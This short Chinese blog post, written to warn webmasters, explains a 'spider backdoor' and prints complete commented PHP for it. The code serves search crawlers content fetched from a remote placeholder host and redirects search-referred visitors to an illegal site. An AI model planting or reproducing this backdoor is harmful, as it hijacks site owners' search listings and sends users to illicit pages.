蜘蛛后门

最近有的朋友的辛苦运营的站 搜索引擎快照全部变成各种广告和非法信息，输入访问网站一切正常，通过快照访问到的网站会自动调整到非法网站上去，以下为这种后门的php写法，不懂进攻，怎能防守，希望有助站长朋友们。

<?php
$dw_user_agent = "-".strtolower($_SERVER['HTTP_USER_AGENT']);   //获取user_agent字符
$dw_spider = array('baidu','google','sogou','msn','youdao','soso');  //定义各种引擎的user_agent
$dw_isspider = false; //初始化变量
foreach($dw_spider as $v){   //循环判断是否是蜘蛛
if ( strpos($dw_user_agent,$v) ){
$dw_isspider = true; }   //如果是则赋值true给dw_isspider
}
 
if ($dw_isspider == true){ //当确认是蜘蛛时
$dw_dataurl=file_get_contents("<a href="http://www.xxx.com/put.txt" target="_blank">http://www.xxx.com/put.txt</a>"); //读取后面url的文件内容,里面为一个网址
$dw_data=file_get_contents("$dw_dataurl"); //读取里面网址的网页内容，这样就可以达到控制做流量的网站地址了
exit($dw_data); }  //结束访问并返回读取到的网页的内容  这样引擎的快照全部是指定的网站内容
 
else{ $dw_ref = @strtolower($_SERVER['HTTP_REFERER']); //如果不是蜘蛛且来源网站为一下定义的
$dw_s = array('baidu.com','soso.com','sogou.com','youdao.com','google.c','bing.com'); //定义访问来源
foreach($dw_s as $v){
if ( strpos($dw_ref,$v) ){ $dw_url = <a href="http://www.xxx.com/goto.php" target="_blank">http://www.xxx.com/goto.php</a>; //判断访问来源是不是上面的，如果是则把跳转的网站地址赋值到dw_url
header("Location: ".$dw_url); exit; } }  //跳转到定义的网站，达到通过快照访问跳转到指定的非法网站
}
?>